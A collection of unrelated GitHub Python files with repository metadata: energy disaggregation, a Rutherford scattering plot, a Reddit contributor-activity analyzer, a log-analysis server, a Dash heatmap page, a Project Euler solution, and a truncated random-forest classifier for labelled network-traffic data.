self.load_default_models()\n\n def load_default_models(self):\n \"\"\"\n Loads the default models into the memory\n \"\"\"\n\n self.log.info(\"-----Starting to load default models for all the appliances-----\")\n for appliance_name, model_name in self.default_appliance_model_dict.items():\n if not self._check_if_model_already_loaded(appliance_name, model_name):\n try:\n module = importlib.import_module(('classifiers.{}'.format(_module_names[appliance_name])))\n class_ = getattr(module, '{}'.format(_classifier_names[appliance_name]))\n self.appliance_classifier_dict[appliance_name] = class_(model_name=model_name)\n except Exception as e:\n raise e\n\n try:\n self.log.info(\"Loading model with model name {} for appliance {}......\".format(\n model_name, appliance_name))\n self.appliance_classifier_dict[appliance_name].load_model()\n except ImportError as e:\n raise e\n\n self.log.info(\"-----Completed loading default models-----\")\n\n def _check_if_model_already_loaded(self, appliance_name, model_name):\n if appliance_name in self.appliance_classifier_dict:\n if self.appliance_classifier_dict[appliance_name].model_name == model_name:\n return True\n return False\n return False\n\n def _load_models(self, appliance_name, model_name):\n if not self._check_if_model_already_loaded(appliance_name, model_name):\n self.log.info(\"Model not found. 
Loading model {} for appliance {}.\".format(model_name, appliance_name))\n module = importlib.import_module(('classifiers.{}'.format(_module_names[appliance_name])))\n class_ = getattr(module, '{}'.format(_classifier_names[appliance_name]))\n self.appliance_classifier_dict[appliance_name] = class_(model_name=model_name)\n try:\n self.appliance_classifier_dict[appliance_name].load_model()\n except ImportError as e:\n self.log.exception(e)\n raise e\n else:\n self.log.info(\"Model {} already loaded for appliance {}\".format(model_name, appliance_name))\n\n def _select_measurements(self, measurements, resumeTime):\n \"\"\"\n Select measurements from input by resumeTime\n :param measurements:\n :param resumeTime:\n :return:\n \"\"\"\n if isinstance(resumeTime, int):\n return measurements.loc[convert_to_datetime(resumeTime):, :]\n elif isinstance(resumeTime, pd.datetime):\n return measurements.loc[resumeTime:, :]\n else:\n raise TypeError(\"Resume time not an integer, long or a valid pd.datetime: {}\".format(resumeTime))\n\n def predict(self, measurements, algoDefinitions, freq, meter=None):\n \"\"\"\n Predict all disaggregation results for selected appliances.\n :param measurements: pandas.DataFrame, measurements with columns ['power'] and index in pandas datetime\n :param algoDefinitions: List,\n :param freq: int, frequency of measurements\n :param meter: str, meter name\n :return:\n output: dict, appliance_name as key and appliance_power_dict as value\n \"\"\"\n self.log.info(\"-----Starting event detection on {}-----\".format(meter))\n\n if freq > 10 * 1000:\n # do not resample for these meters with larger resolution\n sample_period = '60s'\n measurements = measurements.resample(sample_period).mean() # .resample('900s').mean()\n else:\n sample_period = '6s'\n measurements = measurements.resample(sample_period).mean()\n measurements = measurements.fillna(0)\n\n output = {}\n if len(measurements) > 10:\n events = event_detection(measurements)\n\n for algo_def in algoDefinitions:\n # Retreiving all the information\n appliance_name = algo_def['applianceName']\n algorithm_id = algo_def.get(\"algorithmId\")\n resumeTime = algo_def.get('resumeTime')\n\n df = self._select_measurements(measurements, resumeTime)\n self.log.info(\"Loading models.........\")\n self._load_models(appliance_name, algorithm_id)\n appliance_classifier = self.appliance_classifier_dict[appliance_name]\n\n appliance_present = appliance_classifier.preprocess(measurements=df, events=events)\n # Todo: Correct this, appliance_present= True\n self.log.info(\"Is Appliance {} present: {}.\".format(appliance_name, appliance_present))\n if appliance_present:\n # appliance_power = pd.DataFrame()\n appliance_power_dict = appliance_classifier.predict(df, events, freq)\n output[appliance_name] = appliance_power_dict\n\n return output\n\n\ndef algorithm_select(appliance_list, mains):\n \"\"\"\n Select appliances for prediction\n :param appliance_list: list, list of selected appliances\n :param mains:\n :return:\n \"\"\"\n\n if isinstance(mains.index[0], int):\n start_time = convert_to_datetime(mains.index[0])\n elif isinstance(mains.index[0], pd.datetime):\n start_time = mains.index[0]\n else:\n raise TypeError(\"Resume time not an integer, long or a valid pd.datetime: {}\".format(type(mains.index[0])))\n algo_def = [\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"REFRIGERATOR\"\n },\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"WASHING_MACHINE\"\n },\n {\"algorithmId\": 
'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"DISHWASHER\"\n },\n {\"algorithmId\": 'simple',\n \"resumeTime\": start_time,\n \"applianceName\": \"HEATING\"\n },\n {\"algorithmId\": 'simple',\n \"resumeTime\": start_time,\n \"applianceName\": \"BASE_LOAD\"\n },\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"DRYER\"\n },\n ]\n\n new_algo_def = []\n for item in algo_def:\n if item['applianceName'] in appliance_list:\n new_algo_def.append(item)\n return new_algo_def\n\n\ndef test(plot=True):\n\n mains = pd.read_csv(\n './dataset/' + 'building_1_mains.csv',\n header=None, index_col=None)\n building_1_dish_washer = pd.read_csv(\n './dataset/' + 'building_1_dish_washer.csv',\n header=None, index_col=None)\n building_1_fridge = pd.read_csv(\n './dataset/' + 'building_1_fridge.csv',\n header=None, index_col=None)\n building_1_kettle = pd.read_csv(\n './dataset/' + 'building_1_kettle.csv',\n header=None, index_col=None)\n building_1_washing_machine = pd.read_csv(\n './dataset/' + 'building_1_washing_machine.csv',\n header=None, index_col=None)\n\n ground_truth = {\n 'DISHWASHER': building_1_dish_washer,\n 'HEATING': building_1_kettle,\n 'REFRIGERATOR': building_1_fridge,\n 'WASHING_MACHINE': building_1_washing_machine, }\n\n df = mains.copy()\n df.columns = ['power']\n df.index = pd.date_range(start='2017-01-01 00:00:00', periods=len(df), freq='6s')\n print('length of df {}'.format(len(df)))\n print(df.tail())\n print(\"--------------------\")\n print(building_1_dish_washer.head())\n\n algoDefinitions = algorithm_select(['BASE_LOAD', 'DISHWASHER',\n 'HEATING', 'REFRIGERATOR', 'WASHING_MACHINE'], df)\n container = Disaggregator()\n events_start = time.time()\n print(\"Time taken {}\".format(time.time() - events_start))\n print(\"-----Starting Predictions-----\")\n start = time.time()\n predicted = container.predict(df, algoDefinitions, freq=1000)\n print(\"TF Prediction done in {} with {}\".format(time.time() - start, predicted))\n\n if plot:\n import matplotlib.pyplot as plt\n # plot predicted\n plt.figure(figsize=(16, 8))\n legend = []\n for app, pre_dict in predicted.items():\n if app != 'BASE_LOAD':\n for model_name, pre_series in pre_dict.items():\n plt.plot(pre_series.index, pre_series.values)\n legend.append('Predicted: {}'.format(model_name + '_' + pre_series.name))\n plt.plot(df.index, df['power'].values)\n legend.append('Input')\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('All_disaggregation_test', wrap=True)\n plt.savefig('All_disaggregation_test.png')\n\n # plot ground truth\n plt.figure(figsize=(16, 8))\n legend = []\n for app, true_y in ground_truth.items():\n plt.plot(df.index, true_y.values)\n legend.append('Ground truth: {}'.format(app))\n\n plt.plot(df.index, df['power'].values)\n legend.append('Input')\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('All ground truth', wrap=True)\n plt.savefig('All_ground_truth.png')\n\n # plot app-wise ground truth and predicted\n for app, pre_dict in predicted.items():\n if app != 'BASE_LOAD':\n plt.figure(figsize=(16, 8))\n legend = []\n true_y = ground_truth[app]\n plt.plot(df.index, true_y.values)\n legend.append('Ground truth: {}'.format(app))\n for model_name, pre_series in pre_dict.items():\n plt.plot(pre_series.index, pre_series.values)\n legend.append('Predicted: {}'.format(pre_series.name))\n\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper 
right')\n plt.title('Ground_Truth vs Predicted: {}'.format(app), wrap=True)\n plt.savefig('Ground_Truth_vs_Predicted_{}.png'.format(app))\n # plt.show()\n\n # plot all predicted together\n plt.figure(figsize=(16, 8))\n legend = []\n for app, pre_dict in predicted.items():\n for model_name, pre_series in pre_dict.items():\n plt.plot(pre_series.index, pre_series.values)\n legend.append('Predicted: {}'.format(model_name + '_' + app))\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('All Predicted', wrap=True)\n plt.savefig('All_Predicted.png')\n # plt.show()\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"opensourcedcgy/ESZ-disaggregation","sub_path":"serve/run_disaggregation.py","file_name":"run_disaggregation.py","file_ext":"py","file_size_in_byte":13635,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"31554642742","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport scipy.constants as c\nfrom pint import UnitRegistry\nu = UnitRegistry()\n\n\ndef scattering(theta, z=2, Z=79, alpha_energy=5.408 * u.MeV):\n theta = theta.to('radian')\n angle_dependency = 1 / (np.sin(theta/2)**4)\n a = 1 / ((4 * np.pi * epsilon_0)**2)\n b = (z * Z * e**2 / (4 * alpha_energy))**2\n return a * b * angle_dependency\n\n\ndf = pd.read_csv('data/scattering_gold_2_micrometer.csv', comment='#', index_col=0)\n\n\ntop = r'''\\begin{tabular}{S[table-format=1.0] S[table-format=3.0]}\n \\toprule\n {$\\theta \\mathbin{/} \\si{\\degree}$} & {$N$} \\\\\n \\midrule\n'''\nbottom = r''' \\bottomrule\n\\end{tabular}\n'''\nwith open('build/scattering_gold_2_micrometer.tex', 'w') as f:\n\n f.write(top)\n\n temp = r' {} & {} \\\\'\n for row in df.itertuples():\n f.write(temp.format(row.Index, row.counts))\n f.write('\\n')\n f.write(bottom)\n\n\ndx = 2 * u.mm\ndy = 10 * u.mm\nl = (41 + 4) * u.mm\ndelta_omega = np.arctan(dy / (2 * l)) * np.arctan(dx / (2 * l)) * 4\nprint('delta_omega is {}'.format(delta_omega))\n\ndensity_gold = 19.3 * (u.kg / u.m**3)\nthickness = 2 * u.micrometer\ngold_mass = 197 * u.gram / u.mol\nn_0 = (density_gold * thickness * c.N_A / u.mol) / gold_mass\nprint('n_0 is {}'.format(n_0.to('1/cm^2')))\n\nR = (41 + 39 + 17 + 4) * u.mm\nA_detector = 2 * u.mm * 10 * u.mm\nN_source = (A_detector / (4 * np.pi * R**2)) * (318000) / u.second\nprint('N_source is {} '.format(N_source.to('1/s')))\n\nN_meassurement = (df.counts.values / 60)/u.second\nprint('N_meassurement is {}'.format(N_meassurement))\n\ncross_section = N_meassurement / (N_source * n_0 * delta_omega)\n# print((N_source * n_0 * delta_omega).to('1/cm^2 1/s 1/radian^2'))\nprint('cross_section is {}'.format(cross_section.to('barn/degree')))\n\nplt.plot(\n df.index,\n cross_section.to('barn/radian'),\n '+',\n label='Gemessener Streuquerschnitt',\n)\n\ne = (c.e * u.coulomb)\nepsilon_0 = c.epsilon_0 * (u.ampere * u.second / (u.volt * u.meter))\nts = np.linspace(0, df.index.max(), 2000) * u.degree\nalpha_energy = 5.408 * u.MeV\nscatter = scattering(\n theta=ts,\n z=2,\n Z=79,\n alpha_energy=alpha_energy,\n).to('barn/radian')\n\nplt.plot(\n ts[scatter.magnitude < 1e9],\n scatter[scatter.magnitude < 1e9],\n '-',\n label='Theoretischer Streuquerschnitt',\n)\nplt.xlabel('Winkel in Grad')\nplt.ylabel(r'$\\dd{\\sigma}{\\Omega} \\Biggm/ 
\\si{\\barn\\per\\steradian}$')\n\nplt.legend(loc='best')\nplt.tight_layout(pad=0.4)\nplt.savefig('build/plots/cross_section.pdf')\n","repo_name":"maxnoe/tudo_masterfp","sub_path":"v16_rutherford/scripts/plot_cross_section.py","file_name":"plot_cross_section.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40715034094","text":"import prawcore\nimport datetime\nimport os\nimport constants\nimport threading\nimport sys\nsys.path.append('.')\nfrom utils import reddit_utils\nfrom tqdm import tqdm\nfrom dotenv import load_dotenv\nload_dotenv(override=True)\n\n\n\"\"\"OH so this is the script where all the magic happens. I'm not even convinced multi-threading was helpful\n here since reddit imposes a pretty strict rate-limit of 60 users/minute I think. But anyways, the point\n of this script is to get the most recent public post of each user in your subreddit, get the date of it, and then store\n (username, years since most recent post) in a csv.\n It takes a while\"\"\"\n\n\nclass SubredditAnalyzer:\n def __init__(self, sub_name=\"ravenclaw\"):\n self.reddit_client = reddit_utils.create_reddit_client()\n self.subreddit = self.reddit_client.subreddit(sub_name)\n self.lock = threading.Lock()\n # TODO: Ideally, I think I would increment a version or something.\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.MAIN_TEXT_FILE)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.MAIN_TEXT_FILE))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.SHADOWBANNED)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.SHADOWBANNED))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNVERIFIED)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNVERIFIED))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNSUBSCRIBED)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNSUBSCRIBED))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.RECENCY_CSV)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.RECENCY_CSV))\n\n def get_random_facts(self) -> str:\n \"\"\"Get some random statistics for fun\"\"\"\n sub_time_created = reddit_utils.convert_reddit_timestamp(self.subreddit.created_utc)\n sub_description = self.subreddit.public_description\n sub_count = self.subreddit.subscribers\n sub_name = self.subreddit.display_name\n num_banned = 0\n banned_users = []\n for ban in self.subreddit.banned():\n num_banned += 1\n banned_users.append(f\"{ban}: {ban.note}\")\n return f\"{sub_name} was created on {sub_time_created}. It has {sub_count} subscribers, and its \" \\\n f\"public description is {sub_description}. 
There are {num_banned} banned users in {sub_name}:\\n\" \\\n f\"{chr(10).join(banned_users)}\"\n\n def get_contributors(self, start_idx=0, end_idx=1000):\n \"\"\"Iterate through the subreddit's contributors and get number of banned/suspended/shadowbanned,\n As well as when each contributor's last (public) post was\"\"\"\n print(start_idx)\n print(end_idx)\n num_contributors = 0\n contributors = []\n shadowbanneds = []\n unverifieds = []\n unsubscribeds = []\n num_unverified = 0\n num_unsubscribed = 0\n num_suspended_or_banned = 0\n years_since_last_post = {\n 0: [],\n 1: [],\n 2: [],\n 3: [],\n 4: [],\n 5: [],\n }\n\n for contributor in tqdm(self.subreddit.contributor(limit=end_idx), total=end_idx):\n if num_contributors <= start_idx - 1:\n num_contributors += 1\n continue\n num_contributors += 1\n try:\n if contributor.verified is False:\n num_unverified += 1\n unverifieds.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNVERIFIED), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n continue\n if contributor.has_subscribed is False:\n num_unsubscribed += 1\n unsubscribeds.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNSUBSCRIBED), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n continue\n except AttributeError:\n num_suspended_or_banned += 1\n shadowbanneds.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.SHADOWBANNED), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n continue\n except prawcore.exceptions.NotFound:\n print(f\"Is {contributor} suspended? {contributor.is_suspended}. They have been banned or some shit\")\n num_suspended_or_banned += 1\n shadowbanneds.append(contributor.name)\n continue\n for most_recent_post in contributor.new(limit=1):\n time_created = datetime.datetime.utcfromtimestamp(int(most_recent_post.created_utc))\n if time_created + datetime.timedelta(days=366*5) < datetime.datetime.now():\n delta_years = 5\n years_since_last_post[5].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 5 years.\")\n elif time_created + datetime.timedelta(days=366 * 4) < datetime.datetime.now():\n delta_years = 4\n years_since_last_post[4].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 4 years.\")\n elif time_created + datetime.timedelta(days=366 * 3) < datetime.datetime.now():\n delta_years = 3\n years_since_last_post[3].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 3 years.\")\n elif time_created + datetime.timedelta(days=366 * 2) < datetime.datetime.now():\n delta_years = 2\n years_since_last_post[2].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 2 years.\")\n elif time_created + datetime.timedelta(days=366 * 1) < datetime.datetime.now():\n delta_years = 1\n years_since_last_post[1].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last year.\")\n else:\n delta_years = 0\n years_since_last_post[0].append(contributor)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.RECENCY_CSV), 'a') as csv_file:\n csv_file.write(f\"{contributor.name},{delta_years}\\n\")\n contributors.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.MAIN_TEXT_FILE), \"a\") as f:\n 
f.write(f\"{contributor.name}\\n\")\n\n\n def run_threads(self, num_threads=12):\n threads = []\n for i in range(num_threads):\n thread = threading.Thread(target=self.get_contributors, args=(i * (12_000/num_threads), (i+1) * (12_000/num_threads)))\n threads.append(thread)\n thread.start()\n\n\nif __name__ == '__main__':\n analyzer = SubredditAnalyzer()\n analyzer.run_threads(num_threads=12)\n","repo_name":"kevslinger/admissions-scripts","sub_path":"subreddit_data_scripts/most_recent_post.py","file_name":"most_recent_post.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6350467084","text":"#!/usr/bin/env python\n\n\"\"\"\nbackend server\ninitialize all classes (watcher/preper/results/feedback/model)\nstart watcher\n\"\"\"\nimport re, json\n\nimport yappi, time, threading\n\n\nfrom config.config import Config\nfrom predictor.predict import Predictor\nfrom datasource.watcher import Watcher\nfrom datasource.batcher import Batcher\nfrom prep.log_parser import LogParser\nfrom prep.log_parser_nlp import LogParserNLP\nfrom label.labeler import Labeler\nfrom feedback.fb_mgr import FeedbackMgr\nfrom results.result_mgr import ResultMgr\nfrom results.result import Result\nfrom storage.sqlite import SqliteStore\n\n\ndef is_result_error(result: str):\n return result and result != \"__label__Normal\"\n\nclass Server():\n def __init__(self, config: Config):\n self.config = config\n prepcfg = config[\"drain3\"]\n\n store = SqliteStore()\n #self.preper = LogParser(config_file=prepcfg[\"config_file\"], persist=True, persist_dir=prepcfg[\"persist_dir\"])\n self.preper = LogParserNLP(model_file=prepcfg[\"model_file\"])\n self.labler = Labeler(naive=True, datadir=prepcfg[\"persist_dir\"])\n self.feedback = FeedbackMgr(remote_url=\"\", local_file=\"./fb.csv\", store=store)\n self.results = ResultMgr(fbmgr=self.feedback, store=store)\n\n self.predictor = Predictor(preper=self.preper, model=self.labler)\n self.watcher = Watcher(config=config, callback=self.process_line)\n self.batcher = Batcher(config=config, callback=self.process_line)\n \n \n def start_watch(self):\n self.watcher.start()\n\n # start batcher in back ground\n def start_batch_in_bg(self, file: str):\n self.batcher.start_in_bg(file)\n\n # start batcher in foreground\n def start_batch(self, file: str):\n self.batcher.start(file)\n\n # start watcher in back ground\n def start_in_bg(self):\n self.watcher.start_in_bg()\n\n def process_line(self, line: str, meta: dict, context: dict = {}):\n\n # print(\"before prediction\", meta)\n\n result = self.predictor.predict(line, meta, context)\n \n # print(\"after prediction\", result.meta)\n\n if result is not None and result.is_error():\n self.results.add(result)\n\n\n\nif __name__ == \"__main__\":\n cfg = {}\n cfg[\"drain3\"]={\"config_file\":\"drain3.ini\", \"persist_dir\":\".\", \"model_file\":\"model/star.cla.bin\"}\n server = Server(config=cfg)\n yappi.start()\n server.start_batch(\"/tmp/ClusterDelete.zip\")\n time.sleep(30)\n yappi.stop()\n\n threads = yappi.get_thread_stats()\n for thread in threads:\n print(\n \"Function stats for (%s) (%d)\" % (thread.name, thread.id)\n ) # it is the Thread.__class__.__name__\n yappi.get_func_stats(ctx_id=thread.id).print_all()\n","repo_name":"kuberca/star","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
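Each record in this dump pairs one source file (the text field, with double quotes and newlines JSON-escaped) with provenance metadata such as seq_id, repo_name, sub_path, program_lang and lang. A minimal sketch of how such a dump can be consumed, assuming one JSON object per line once the diff's leading "+" markers are stripped; the file path and helper name below are illustrative placeholders, not part of the dataset:

import json

def iter_records(path="code_dump.jsonl"):  # placeholder path, assumption
    # One JSON object per line; skip blank lines defensively.
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if line:
                yield json.loads(line)

for rec in iter_records():
    # Fields observed in the records above.
    print(rec["seq_id"], rec["repo_name"], rec["sub_path"], rec["program_lang"], rec["lang"])
    source_code = rec["text"]  # the raw file contents as a single string

Reading lazily with a generator keeps memory flat even for large dumps, since each record's text field can hold an entire source file.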
+{"seq_id":"38917315234","text":"\"\"\"\n Dash app\n\"\"\"\n\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\n\nimport utilities as u\nimport constants as c\nimport layout as lay\nfrom plots import plots_heatmaps as plots\n\n\nclass Page(lay.AppPage):\n \"\"\" Page Heatmaps \"\"\"\n\n link = c.dash.LINK_HEATMAPS\n\n def __init__(self, app):\n super().__init__([c.dash.INPUT_CATEGORIES])\n\n @app.callback(\n [Output(f\"plot_heat_{x}\", \"figure\") for x in [\"i\", \"e\", \"distribution\"]],\n [\n Input(\"global_df\", \"children\"),\n Input(\"input_categories\", \"value\"),\n Input(\"heat_aux\", \"children\"),\n ],\n )\n # pylint: disable=unused-variable,unused-argument\n def update_plots(df_in, categories, aux):\n \"\"\"\n Updates the plots\n\n Args:\n df_in: transactions dataframe\n categories: categories to use\n \"\"\"\n df = u.dfs.filter_data(u.uos.b64_to_df(df_in), categories)\n return (\n plots.get_heatmap(df, c.names.INCOMES),\n plots.get_heatmap(df, c.names.EXPENSES),\n plots.dist_plot(df),\n )\n\n def get_body(self):\n return [\n lay.two_columns(\n [\n lay.card(dcc.Graph(id=\"plot_heat_i\", config=c.dash.PLOT_CONFIG)),\n lay.card(dcc.Graph(id=\"plot_heat_e\", config=c.dash.PLOT_CONFIG)),\n ]\n ),\n lay.card(dcc.Graph(id=\"plot_heat_distribution\", config=c.dash.PLOT_CONFIG)),\n lay.get_dummy_div(\"heat_aux\"),\n ]\n","repo_name":"villoro/expensor","sub_path":"src/pages/page_heatmaps.py","file_name":"page_heatmaps.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20432525706","text":"def is_leap_year(year):\n if year % 4 == 0:\n if year % 1000 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n else:\n return True\n else:\n return False\n\n\ndef days_of_month(month, year):\n days = [0, 31, 0, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n if month != 2:\n return days[month]\n else:\n if is_leap_year(year):\n return 29\n else:\n return 28\n\n\ndef counting_sundays(from_year, to_year):\n current_day = 1\n count = 0\n\n for i in range(1900, to_year + 1):\n for j in range(1, 13):\n if current_day == 7:\n if i >= from_year:\n count += 1\n days = days_of_month(j, i)\n if days == 29:\n current_day += 1\n if days == 30:\n current_day += 2\n if days == 31:\n current_day += 3\n if current_day > 7:\n current_day %= 7\n\n return count\n\n\nprint(\"Result is {}\".format(counting_sundays(1901, 2000)))\n","repo_name":"janFrancoo/Project-Euler","sub_path":"problem19/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4122902370","text":"import os\nimport json\nimport csv\nimport sys\nimport pickle\nimport time\nimport logging\nimport argparse\nimport pandas as pd\n\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn.model_selection import KFold, StratifiedKFold\n\nformatter = '%(asctime)s [%(filename)s:%(lineno)s - %(funcName)20s()] %(levelname)s | %(message)s'\n\nlogging.basicConfig(filename=r\"out/classifier-log.log\", # todo fix this\n filemode='a',\n format=formatter,\n datefmt='%H:%M:%S',\n level=logging.DEBUG)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nfrom process_data import read_files, normalise_data, sort_time\n\ndef make_dir(path):\n if not os.path.exists(path):\n logger.info(\"Creating directory at 
path: {0}\".format(path))\n os.makedirs(path)\n\ndef label_encode_class(data):\n def label_encoder_mapping(le):\n # todo save this label encoder later for prediction.\n return dict(zip(le.classes_, le.transform(le.classes_)))\n\n assert data.shape[1] == 1 # only one column - output label.\n\n le = LabelEncoder()\n le.fit(data)\n\n logger.info(\"Label encoder mapping {0}\".format(label_encoder_mapping(le)))\n\n return le.transform(data).ravel(), label_encoder_mapping(le)\n\n\ndef split_data(data, test_size=0.3, normalise=False):\n from sklearn.model_selection import train_test_split\n categorical_columns = data.select_dtypes(['object'])\n excluded_columns = ['Timestamp', 'Dst Port']\n output = ['Label']\n inputs = [label for label in list(data) if label not in output and label not in categorical_columns\n and label not in excluded_columns]\n\n if normalise:\n logger.info(\"Data is being normalised.\")\n data[inputs] = normalise_data(data[inputs])\n\n X = data[inputs]\n y, mapping = label_encode_class(data[output])\n logger.info(\"Y/Output variable {0} with shape {1}\".format(output, y.shape))\n logger.info(\"X/Input variables {0} with shape {1}\".format(inputs, X.shape))\n logger.info(\"Train vs Test split: {0}-{1}\".format(1 - test_size, test_size))\n # return train_test_split(X, y, test_size=test_size), mapping # 70% training and 30% test\n return X.to_numpy(), y, mapping, X.columns\n\ndef split_time_series(data, normalise=True):\n no_of_split = 3# int((len(data) - 3) / 3) # 67-33\n categorical_columns = data.select_dtypes(['object'])\n excluded_columns = ['Timestamp', 'Dst Port']\n\n output = ['Label']\n inputs = [label for label in list(data) if label not in output and label not in categorical_columns\n and label not in excluded_columns]\n\n if normalise:\n logger.info(\"Data is being normalised.\")\n logger.info(\"Inputs: {0}\".format(inputs))\n data[inputs] = normalise_data(data[inputs])\n\n X = data[inputs]\n y, mapping = label_encode_class(data[output])\n time_series_split = TimeSeriesSplit(n_splits=no_of_split)\n\n for train_index, test_index in time_series_split.split(X):\n # To get the indices\n #logger.info(\"Train index: {0} - Test index: {1}\".format(train_index, test_index))\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n # print(\"X: {0}\".format(X))\n #print(\"Xtrain: {0}\".format(X_train))\n #print(\"Xtest: {0}\".format(X_test))\n y_train, y_test = y[train_index], y[test_index]\n #print(\"Y: {0}\".format(y))\n #print(\"Y_train: {0}\".format(y_train))\n #print(\"Y_test: {0}\".format(y_test))\n logger.info(\"Observations: {0}\".format(len(train_index) + len(test_index)))\n logger.info(\"Training observations: {0}\".format(len(train_index)))\n logger.info(\"Testing observations: {0}\".format(len(test_index)))\n yield X_train, X_test, y_train, y_test, mapping\n\n\ndef generate_classification_report(fp, method, y_test, y_pred, save=False):\n report = metrics.classification_report(y_test, y_pred, output_dict=True)\n report_df = pd.DataFrame(report).T\n\n out = r\"{0}/{1}-classification_report.csv\".format(fp, method)\n if save:\n report_df.to_csv(out)\n logger.info(\"Saving classification report at location: {0}\".format(out))\n return report\n\n\ndef save_metrics(fp, method_name, mapping, accuracy, time, i=\"\"):\n encoder_out = '{0}/{1}-encoder-mapping-{2}.txt'.format(fp, method_name, i)\n logger.info(\"Saving label encoder data at location: %s\" % encoder_out)\n pd.DataFrame.from_dict(mapping, orient='index').to_csv(encoder_out)\n\n metrics_out = 
'{0}/{1}-metrics-{2}.txt'.format(fp, method_name, i)\n metrics_dict = {'accuracy': accuracy,\n 'run-time': time}\n\n logger.info(\"Accuracy: {0}\".format(accuracy))\n logger.info(\"Classifier took {0} seconds to train\".format(time))\n logger.info(\"Saving metrics file at location {0}\".format(metrics_out))\n pd.DataFrame.from_dict(metrics_dict, orient='index').to_csv(metrics_out)\n\n\ndef save_feature_importances(feature_importances, fp, i=\"\"):\n feature_importances.to_csv(r\"{0}/random-forest-feature-importance-{1}.csv\".format(fp, i))\n\n\ndef save_model(model, method_name, fp, i=\"\"):\n out = (\"{0}/{1}-{2}.sav\").format(fp, method_name, i)\n logger.info(\"Saving {0} model at location: {1}\".format(method_name, out))\n pickle.dump(model, open(out, 'wb'))\n\n\ndef calculate_time(start_time):\n return time.time() - start_time\n\ndef random_forest_classifier(data, fp, save=False, time_series=False):\n from sklearn.ensemble import RandomForestClassifier\n method_name = \"random-forest\"\n\n if time_series:\n for i, Xy in enumerate(split_time_series(data)):\n X_train, X_test, y_train, y_test, mapping = Xy\n print(type(mapping))\n logger.info(\"Random forest classifier -- TIME SERIES -- initialised\")\n start_time = time.time()\n clf = RandomForestClassifier(n_estimators=100, verbose=2)\n clf.fit(X_train, y_train)\n feature_importances = pd.DataFrame(clf.feature_importances_, index=X_train.columns,\n columns=['importance']).sort_values('importance', ascending=False)\n\n y_pred = clf.predict(X_test)\n generate_classification_report(fp, \"{0}-{1}\".format(method_name, i), y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n save_feature_importances(feature_importances, fp, i)\n\n if save:\n save_metrics(fp, method_name, mapping, accuracy, run_time, i)\n save_model(clf, method_name, fp, i)\n\n else:\n X, y, mapping, columns = split_data(data)\n # X_train, X_test, y_train, y_test = Xy\n\n cv = StratifiedKFold(n_splits=10, random_state=42, shuffle=False)\n logger.info(\"Random forest classifier -- initialised\")\n i = 0\n for train_index, test_index in cv.split(X, y):\n 